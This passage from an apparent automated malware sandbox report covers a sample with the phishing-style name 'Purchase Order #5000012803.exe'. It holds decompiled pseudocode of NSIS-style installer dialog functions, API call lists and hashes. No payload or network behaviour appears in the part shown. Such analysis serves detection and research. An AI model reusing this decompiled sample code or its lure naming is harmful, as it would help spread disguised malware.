                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                      • String ID: {
                      • API String ID: 590372296-366298937
                      • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                      • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                      • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                      • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                      				struct HWND__* _v8;
                      				struct HWND__* _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				void* _v24;
                      				long _v28;
                      				int _v32;
                      				signed int _v40;
                      				int _v44;
                      				signed int* _v56;
                      				intOrPtr _v60;
                      				signed int _v64;
                      				long _v68;
                      				void* _v72;
                      				intOrPtr _v76;
                      				intOrPtr _v80;
                      				void* _v84;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				struct HWND__* _t182;
                      				int _t196;
                      				long _t202;
                      				signed int _t206;
                      				signed int _t217;
                      				void* _t220;
                      				void* _t221;
                      				int _t227;
                      				signed int _t232;
                      				signed int _t233;
                      				signed int _t240;
                      				struct HBITMAP__* _t250;
                      				void* _t252;
                      				char* _t268;
                      				signed char _t269;
                      				long _t274;
                      				int _t280;
                      				signed int* _t281;
                      				int _t282;
                      				long _t283;
                      				int _t285;
                      				long _t286;
                      				signed int _t287;
                      				long _t288;
                      				signed int _t291;
                      				signed int _t298;
                      				signed int _t300;
                      				signed int _t302;
                      				int* _t310;
                      				void* _t311;
                      				int _t315;
                      				int _t316;
                      				int _t317;
                      				signed int _t318;
                      				void* _t320;
                      
                      				_v12 = GetDlgItem(_a4, 0x3f9);
                      				_t182 = GetDlgItem(_a4, 0x408);
                      				_t280 =  *0x423ec8;
                      				_t320 = SendMessageA;
                      				_v8 = _t182;
                      				_t315 = 0;
                      				_v32 = _t280;
                      				_v20 =  *0x423eb0 + 0x94;
                      				if(_a8 != 0x110) {
                      					L23:
                      					if(_a8 != 0x405) {
                      						_t289 = _a16;
                      					} else {
                      						_a12 = _t315;
                      						_t289 = 1;
                      						_a8 = 0x40f;
                      						_a16 = 1;
                      					}
                      					if(_a8 == 0x4e || _a8 == 0x413) {
                      						_v16 = _t289;
                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                      							if(( *0x423eb9 & 0x00000002) != 0) {
                      								L41:
                      								if(_v16 != _t315) {
                      									_t232 = _v16;
                      									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                      										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                      									}
                      									_t233 = _v16;
                      									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                      										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                      											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                      										} else {
                      											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                      										}
                      									}
                      								}
                      								goto L48;
                      							}
                      							if(_a8 == 0x413) {
                      								L33:
                      								_t289 = 0 | _a8 != 0x00000413;
                      								_t240 = E004046F2(_v8, _a8 != 0x413);
                      								if(_t240 >= _t315) {
                      									_t93 = _t280 + 8; // 0x8
                      									_t310 = _t240 * 0x418 + _t93;
                      									_t289 =  *_t310;
                      									if((_t289 & 0x00000010) == 0) {
                      										if((_t289 & 0x00000040) == 0) {
                      											_t298 = _t289 ^ 0x00000001;
                      										} else {
                      											_t300 = _t289 ^ 0x00000080;
                      											if(_t300 >= 0) {
                      												_t298 = _t300 & 0xfffffffe;
                      											} else {
                      												_t298 = _t300 | 0x00000001;
                      											}
                      										}
                      										 *_t310 = _t298;
                      										E0040117D(_t240);
                      										_t289 = 1;
                      										_a8 = 0x40f;
                      										_a12 = 1;
                      										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
                      									}
                      								}
                      								goto L41;
                      							}
                      							_t289 = _a16;
                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                      								goto L41;
                      							}
                      							goto L33;
                      						} else {
                      							goto L48;
                      						}
                      					} else {
                      						L48:
                      						if(_a8 != 0x111) {
                      							L56:
                      							if(_a8 == 0x200) {
                      								SendMessageA(_v8, 0x200, _t315, _t315);
                      							}
                      							if(_a8 == 0x40b) {
                      								_t220 =  *0x420474;
                      								if(_t220 != _t315) {
                      									ImageList_Destroy(_t220);
                      								}
                      								_t221 =  *0x42048c;
                      								if(_t221 != _t315) {
                      									GlobalFree(_t221);
                      								}
                      								 *0x420474 = _t315;
                      								 *0x42048c = _t315;
                      								 *0x423f00 = _t315;
                      							}
                      							if(_a8 != 0x40f) {
                      								L86:
                      								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
                      									_t316 = (0 | _a16 == 0x00000020) << 3;
                      									ShowWindow(_v8, _t316);
                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                      								}
                      								goto L89;
                      							} else {
                      								E004011EF(_t289, _t315, _t315);
                      								if(_a12 != _t315) {
                      									E0040140B(8);
                      								}
                      								if(_a16 == _t315) {
                      									L73:
                      									E004011EF(_t289, _t315, _t315);
                      									_v32 =  *0x42048c;
                      									_t196 =  *0x423ec8;
                      									_v60 = 0xf030;
                      									_v16 = _t315;
                      									if( *0x423ecc <= _t315) {
                      										L84:
                      										InvalidateRect(_v8, _t315, 1);
                      										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
                      											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
                      										}
                      										goto L86;
                      									}
                      									_t281 = _t196 + 8;
                      									do {
                      										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                      										if(_t202 != _t315) {
                      											_t291 =  *_t281;
                      											_v68 = _t202;
                      											_v72 = 8;
                      											if((_t291 & 0x00000001) != 0) {
                      												_v72 = 9;
                      												_v56 =  &(_t281[4]);
                      												_t281[0] = _t281[0] & 0x000000fe;
                      											}
                      											if((_t291 & 0x00000040) == 0) {
                      												_t206 = (_t291 & 0x00000001) + 1;
                      												if((_t291 & 0x00000010) != 0) {
                      													_t206 = _t206 + 3;
                      												}
                      											} else {
                      												_t206 = 3;
                      											}
                      											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                      											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                      											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                      										}
                      										_v16 = _v16 + 1;
                      										_t281 =  &(_t281[0x106]);
                      									} while (_v16 <  *0x423ecc);
                      									goto L84;
                      								} else {
                      									_t282 = E004012E2( *0x42048c);
                      									E00401299(_t282);
                      									_t217 = 0;
                      									_t289 = 0;
                      									if(_t282 <= _t315) {
                      										L72:
                      										SendMessageA(_v12, 0x14e, _t289, _t315);
                      										_a16 = _t282;
                      										_a8 = 0x420;
                      										goto L73;
                      									} else {
                      										goto L69;
                      									}
                      									do {
                      										L69:
                      										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                      											_t289 = _t289 + 1;
                      										}
                      										_t217 = _t217 + 1;
                      									} while (_t217 < _t282);
                      									goto L72;
                      								}
                      							}
                      						}
                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                      							goto L89;
                      						} else {
                      							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                      							if(_t227 == 0xffffffff) {
                      								goto L89;
                      							}
                      							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                      							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                      								_t283 = 0x20;
                      							}
                      							E00401299(_t283);
                      							SendMessageA(_a4, 0x420, _t315, _t283);
                      							_a12 = 1;
                      							_a16 = _t315;
                      							_a8 = 0x40f;
                      							goto L56;
                      						}
                      					}
                      				} else {
                      					 *0x423f00 = _a4;
                      					_t285 = 2;
                      					_v28 = 0;
                      					_v16 = _t285;
                      					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
                      					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                      					 *0x420480 =  *0x420480 | 0xffffffff;
                      					_v24 = _t250;
                      					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
                      					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                      					 *0x420474 = _t252;
                      					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                      					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
                      					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                      						SendMessageA(_v8, 0x111b, 0x10, 0);
                      					}
                      					DeleteObject(_v24);
                      					_t286 = 0;
                      					do {
                      						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                      						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                      							if(_t286 != 0x20) {
                      								_v16 = _t315;
                      							}
                      							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
                      						}
                      						_t286 = _t286 + 1;
                      					} while (_t286 < 0x21);
                      					_t317 = _a16;
                      					_t287 = _v16;
                      					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                      					_push(0x15);
                      					E00403E37(_a4);
                      					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                      					_push(0x16);
                      					E00403E37(_a4);
                      					_t318 = 0;
                      					_t288 = 0;
                      					if( *0x423ecc <= 0) {
                      						L19:
                      						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                      						goto L20;
                      					} else {
                      						_t311 = _v32 + 8;
                      						_v24 = _t311;
                      						do {
                      							_t268 = _t311 + 0x10;
                      							if( *_t268 != 0) {
                      								_v60 = _t268;
                      								_t269 =  *_t311;
                      								_t302 = 0x20;
                      								_v84 = _t288;
                      								_v80 = 0xffff0002;
                      								_v76 = 0xd;
                      								_v64 = _t302;
                      								_v40 = _t318;
                      								_v68 = _t269 & _t302;
                      								if((_t269 & 0x00000002) == 0) {
                      									if((_t269 & 0x00000004) == 0) {
                      										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                      									} else {
                      										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                      									}
                      								} else {
                      									_v76 = 0x4d;
                      									_v44 = 1;
                      									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                      									_v28 = 1;
                      									 *( *0x42048c + _t318 * 4) = _t274;
                      									_t288 =  *( *0x42048c + _t318 * 4);
                      								}
                      							}
                      							_t318 = _t318 + 1;
                      							_t311 = _v24 + 0x418;
                      							_v24 = _t311;
                      						} while (_t318 <  *0x423ecc);
                      						if(_v28 != 0) {
                      							L20:
                      							if(_v16 != 0) {
                      								E00403E6C(_v8);
                      								_t280 = _v32;
                      								_t315 = 0;
                      								goto L23;
                      							} else {
                      								ShowWindow(_v12, 5);
                      								E00403E6C(_v12);
                      								L89:
                      								return E00403E9E(_a8, _a12, _a16);
                      							}
                      						}
                      						goto L19;
                      					}
                      				}
                      			}



























































                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                      • String ID: $M$N
                      • API String ID: 1638840714-813528018
                      • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                      • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                      • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                      • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                      				signed int _v8;
                      				struct HWND__* _v12;
                      				long _v16;
                      				long _v20;
                      				char _v24;
                      				long _v28;
                      				char _v32;
                      				intOrPtr _v36;
                      				long _v40;
                      				signed int _v44;
                      				CHAR* _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				CHAR* _v68;
                      				void _v72;
                      				char _v76;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t81;
                      				long _t86;
                      				signed char* _t88;
                      				void* _t94;
                      				signed int _t95;
                      				signed short _t113;
                      				signed int _t117;
                      				char* _t122;
                      				intOrPtr* _t138;
                      				signed int* _t145;
                      				signed int _t148;
                      				signed int _t153;
                      				struct HWND__* _t159;
                      				CHAR* _t162;
                      				int _t163;
                      
                      				_t81 =  *0x41fc68; // 0x0
                      				_v36 = _t81;
                      				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                      				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                      				if(_a8 == 0x40b) {
                      					E0040532A(0x3fb, _t162);
                      					E00405CE3(_t162);
                      				}
                      				if(_a8 != 0x110) {
                      					L8:
                      					if(_a8 != 0x111) {
                      						L20:
                      						if(_a8 == 0x40f) {
                      							L22:
                      							_v8 = _v8 & 0x00000000;
                      							_v12 = _v12 & 0x00000000;
                      							E0040532A(0x3fb, _t162);
                      							if(E00405659(_t180, _t162) == 0) {
                      								_v8 = 1;
                      							}
                      							E00405A85(0x41f460, _t162);
                      							_t145 = 0;
                      							_t86 = E00405DA3(0);
                      							_v16 = _t86;
                      							if(_t86 == 0) {
                      								L31:
                      								E00405A85(0x41f460, _t162);
                      								_t88 = E0040560C(0x41f460);
                      								if(_t88 != _t145) {
                      									 *_t88 =  *_t88 & 0x00000000;
                      								}
                      								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                      									_t153 = _a8;
                      									goto L37;
                      								} else {
                      									_t163 = 0x400;
                      									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                      									_v12 = 1;
                      									goto L38;
                      								}
                      							} else {
                      								if(0 == 0x41f460) {
                      									L30:
                      									_t145 = 0;
                      									goto L31;
                      								} else {
                      									goto L26;
                      								}
                      								while(1) {
                      									L26:
                      									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
                      									if(_t113 != 0) {
                      										break;
                      									}
                      									if(_t145 != 0) {
                      										 *_t145 =  *_t145 & _t113;
                      									}
                      									_t145 = E004055BF(0x41f460) - 1;
                      									 *_t145 = 0x5c;
                      									if(_t145 != 0x41f460) {
                      										continue;
                      									} else {
                      										goto L30;
                      									}
                      								}
                      								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                      								_v12 = 1;
                      								_t145 = 0;
                      								L37:
                      								_t163 = 0x400;
                      								L38:
                      								_t94 = E004046C5(5);
                      								if(_v12 != _t145 && _t153 < _t94) {
                      									_v8 = 2;
                      								}
                      								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
                      									E00404610(0x3ff, 0xfffffffb, _t94);
                      									if(_v12 == _t145) {
                      										SetDlgItemTextA(_a4, _t163, 0x41f450);
                      									} else {
                      										E00404610(_t163, 0xfffffffc, _t153);
                      									}
                      								}
                      								_t95 = _v8;
                      								 *0x423f44 = _t95;
                      								if(_t95 == _t145) {
                      									_v8 = E0040140B(7);
                      								}
                      								if(( *(_v36 + 0x14) & _t163) != 0) {
                      									_v8 = _t145;
                      								}
                      								E00403E59(0 | _v8 == _t145);
                      								if(_v8 == _t145 &&  *0x420484 == _t145) {
                      									E0040420A();
                      								}
                      								 *0x420484 = _t145;
                      								goto L53;
                      							}
                      						}
                      						_t180 = _a8 - 0x405;
                      						if(_a8 != 0x405) {
                      							goto L53;
                      						}
                      						goto L22;
                      					}
                      					_t117 = _a12 & 0x0000ffff;
                      					if(_t117 != 0x3fb) {
                      						L12:
                      						if(_t117 == 0x3e9) {
                      							_t148 = 7;
                      							memset( &_v72, 0, _t148 << 2);
                      							_v76 = _a4;
                      							_v68 = 0x420498;
                      							_v56 = E004045AA;
                      							_v52 = _t162;
                      							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
                      							_t122 =  &_v76;
                      							_v60 = 0x41;
                      							__imp__SHBrowseForFolderA(_t122);
                      							if(_t122 == 0) {
                      								_a8 = 0x40f;
                      							} else {
                      								__imp__CoTaskMemFree(_t122);
                      								E00405578(_t162);
                      								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
                      								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
                      									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
                      									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
                      										lstrcatA(_t162, 0x422e40);
                      									}
                      								}
                      								 *0x420484 =  &(( *0x420484)[0]);
                      								SetDlgItemTextA(_a4, 0x3fb, _t162);
                      							}
                      						}
                      						goto L20;
                      					}
                      					if(_a12 >> 0x10 != 0x300) {
                      						goto L53;
                      					}
                      					_a8 = 0x40f;
                      					goto L12;
                      				} else {
                      					_t159 = _a4;
                      					_v12 = GetDlgItem(_t159, 0x3fb);
                      					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
                      						E00405578(_t162);
                      					}
                      					 *0x423678 = _t159;
                      					SetWindowTextA(_v12, _t162);
                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                      					_push(1);
                      					E00403E37(_t159);
                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                      					_push(0x14);
                      					E00403E37(_t159);
                      					E00403E6C(_v12);
                      					_t138 = E00405DA3(7);
                      					if(_t138 == 0) {
                      						L53:
                      						return E00403E9E(_a8, _a12, _a16);
                      					}
                      					 *_t138(_v12, 1);
                      					goto L8;
                      				}
                      			}

                      APIs
                      • GetDlgItem.USER32 ref: 004042C1
                      • SetWindowTextA.USER32(?,?), ref: 004042EE
                      • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                      • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                      • lstrcmpiA.KERNEL32(icluciob,00420498,00000000,?,?), ref: 004043E0
                      • lstrcatA.KERNEL32(?,icluciob), ref: 004043EC
                      • SetDlgItemTextA.USER32 ref: 004043FC
                        • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                        • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                      • SetDlgItemTextA.USER32 ref: 00404549
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                      • String ID: A$C:\Users\user\AppData\Local\Temp$icluciob
                      • API String ID: 2246997448-1867330012
                      • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                      • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                      • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                      • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 74%
                      			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                      				signed int _v8;
                      				struct _ITEMIDLIST* _v12;
                      				signed int _v16;
                      				signed char _v20;
                      				signed char _v24;
                      				signed int _v28;
                      				signed int _t36;
                      				CHAR* _t37;
                      				signed char _t39;
                      				signed int _t40;
                      				int _t41;
                      				char _t51;
                      				char _t52;
                      				char _t54;
                      				char _t56;
                      				void* _t64;
                      				signed int _t68;
                      				signed int _t73;
                      				signed char _t74;
                      				char _t81;
                      				void* _t83;
                      				CHAR* _t84;
                      				void* _t86;
                      				signed int _t93;
                      				signed int _t95;
                      				void* _t96;
                      
                      				_t86 = __esi;
                      				_t83 = __edi;
                      				_t64 = __ebx;
                      				_t36 = _a8;
                      				if(_t36 < 0) {
                      					_t36 =  *( *0x42367c - 4 + _t36 * 4);
                      				}
                      				_t73 =  *0x423ed8 + _t36;
                      				_t37 = 0x422e40;
                      				_push(_t64);
                      				_push(_t86);
                      				_push(_t83);
                      				_t84 = 0x422e40;
                      				if(_a4 - 0x422e40 < 0x800) {
                      					_t84 = _a4;
                      					_a4 = _a4 & 0x00000000;
                      				}
                      				while(1) {
                      					_t81 =  *_t73;
                      					if(_t81 == 0) {
                      						break;
                      					}
                      					__eflags = _t84 - _t37 - 0x400;
                      					if(_t84 - _t37 >= 0x400) {
                      						break;
                      					}
                      					_t73 = _t73 + 1;
                      					__eflags = _t81 - 0xfc;
                      					_a8 = _t73;
                      					if(__eflags <= 0) {
                      						if(__eflags != 0) {
                      							 *_t84 = _t81;
                      							_t84 =  &(_t84[1]);
                      							__eflags = _t84;
                      						} else {
                      							 *_t84 =  *_t73;
                      							_t84 =  &(_t84[1]);
                      							_t73 = _t73 + 1;
                      						}
                      						continue;
                      					}
                      					_t39 =  *(_t73 + 1);
                      					_t74 =  *_t73;
                      					_a8 = _a8 + 2;
                      					_v20 = _t39;
                      					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                      					_t68 = _t74;
                      					_t40 = _t39 | 0x00000080;
                      					__eflags = _t81 - 0xfe;
                      					_v28 = _t68;
                      					_v24 = _t74 | 0x00000080;
                      					_v16 = _t40;
                      					if(_t81 != 0xfe) {
                      						__eflags = _t81 - 0xfd;
                      						if(_t81 != 0xfd) {
                      							__eflags = _t81 - 0xff;
                      							if(_t81 == 0xff) {
                      								__eflags = (_t40 | 0xffffffff) - _t93;
                      								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                      							}
                      							L41:
                      							_t41 = lstrlenA(_t84);
                      							_t73 = _a8;
                      							_t84 =  &(_t84[_t41]);
                      							_t37 = 0x422e40;
                      							continue;
                      						}
                      						__eflags = _t93 - 0x1d;
                      						if(_t93 != 0x1d) {
                      							__eflags = (_t93 << 0xa) + 0x424000;
                      							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
                      						} else {
                      							E004059E3(_t84,  *0x423ea8);
                      						}
                      						__eflags = _t93 + 0xffffffeb - 7;
                      						if(_t93 + 0xffffffeb < 7) {
                      							L32:
                      							E00405CE3(_t84);
                      						}
                      						goto L41;
                      					}
                      					_t95 = 2;
                      					_t51 = GetVersion();
                      					__eflags = _t51;
                      					if(_t51 >= 0) {
                      						L12:
                      						_v8 = 1;
                      						L13:
                      						__eflags =  *0x423f24;
                      						if( *0x423f24 != 0) {
                      							_t95 = 4;
                      						}
                      						__eflags = _t68;
                      						if(_t68 >= 0) {
                      							__eflags = _t68 - 0x25;
                      							if(_t68 != 0x25) {
                      								__eflags = _t68 - 0x24;
                      								if(_t68 == 0x24) {
                      									GetWindowsDirectoryA(_t84, 0x400);
                      									_t95 = 0;
                      								}
                      								while(1) {
                      									__eflags = _t95;
                      									if(_t95 == 0) {
                      										goto L29;
                      									}
                      									_t52 =  *0x423ea4;
                      									_t95 = _t95 - 1;
                      									__eflags = _t52;
                      									if(_t52 == 0) {
                      										L25:
                      										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                      										__eflags = _t54;
                      										if(_t54 != 0) {
                      											L27:
                      											 *_t84 =  *_t84 & 0x00000000;
                      											__eflags =  *_t84;
                      											continue;
                      										}
                      										__imp__SHGetPathFromIDListA(_v12, _t84);
                      										__imp__CoTaskMemFree(_v12);
                      										__eflags = _t54;
                      										if(_t54 != 0) {
                      											goto L29;
                      										}
                      										goto L27;
                      									}
                      									__eflags = _v8;
                      									if(_v8 == 0) {
                      										goto L25;
                      									}
                      									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                      									__eflags = _t56;
                      									if(_t56 == 0) {
                      										goto L29;
                      									}
                      									goto L25;
                      								}
                      								goto L29;
                      							}
                      							GetSystemDirectoryA(_t84, 0x400);
                      							goto L29;
                      						} else {
                      							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
                      							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
                      							__eflags =  *_t84;
                      							if( *_t84 != 0) {
                      								L30:
                      								__eflags = _v20 - 0x1a;
                      								if(_v20 == 0x1a) {
                      									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                      								}
                      								goto L32;
                      							}
                      							E00405AA7(_t71, _t84, _t95, _t84, _v20);
                      							L29:
                      							__eflags =  *_t84;
                      							if( *_t84 == 0) {
                      								goto L32;
                      							}
                      							goto L30;
                      						}
                      					}
                      					__eflags = _t51 - 0x5a04;
                      					if(_t51 == 0x5a04) {
                      						goto L12;
                      					}
                      					__eflags = _v20 - 0x23;
                      					if(_v20 == 0x23) {
                      						goto L12;
                      					}
                      					__eflags = _v20 - 0x2e;
                      					if(_v20 == 0x2e) {
                      						goto L12;
                      					} else {
                      						_v8 = _v8 & 0x00000000;
                      						goto L13;
                      					}
                      				}
                      				 *_t84 =  *_t84 & 0x00000000;
                      				if(_a4 == 0) {
                      					return _t37;
                      				}
                      				return E00405A85(_a4, _t37);
                      			}

                      APIs
                      • GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                      • GetSystemDirectoryA.KERNEL32(icluciob,00000400), ref: 00405BC6
                      • GetWindowsDirectoryA.KERNEL32(icluciob,00000400), ref: 00405BD9
                      • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                      • SHGetPathFromIDListA.SHELL32(00000000,icluciob), ref: 00405C23
                      • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
